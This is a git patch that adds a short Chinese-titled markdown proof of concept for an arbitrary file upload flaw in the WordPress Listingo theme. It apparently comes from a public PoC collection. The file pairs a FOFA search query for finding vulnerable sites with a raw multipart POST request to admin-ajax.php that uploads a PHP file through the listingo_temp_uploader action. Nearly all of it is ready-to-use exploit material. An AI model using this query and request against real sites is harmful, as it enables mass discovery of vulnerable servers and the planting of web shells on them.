From 58d044acf8fa1bd5dc4c6fc85c57a4bdd2789e6b Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 28 Dec 2023 19:58:25 +0800 Subject: [PATCH] =?UTF-8?q?Create=20wordpress=20listingo=20=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- wordpress listingo 文件上传漏洞.md | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 wordpress listingo 文件上传漏洞.md diff --git a/wordpress listingo 文件上传漏洞.md b/wordpress listingo 文件上传漏洞.md new file mode 100644 index 0000000..a823ecd --- /dev/null +++ b/wordpress listingo 文件上传漏洞.md @@ -0,0 +1,27 @@ +## wordpress listingo 文件上传漏洞 + +## fofa +``` +body="wp-content/themes/listingo" +``` + +## poc +``` +POST /wp-admin/admin-ajax.php?action=listingo_temp_uploader HTTP/1.1 +Host: targetUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8rVjnfcgxgKoytcgAccept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Content-Length: 531 + +------WebKitFormBoundary8rVjnfcgxgKoytcg +Content-Disposition: form-data; name="listingo_uploader";filename="1008.php" +Content-Type:text/php + + +------WebKitFormBoundary8rVjnfcgxgKoytcg +Content-Disposition: form-data; name="submit" + +Start Uploader +------WebKitFormBoundary8rVjnfcgxgKoytcg-- +``` +![image](https://github.com/wy876/POC/assets/139549762/8b115456-bcbe-4d0f-b51d-add3dcf0db78)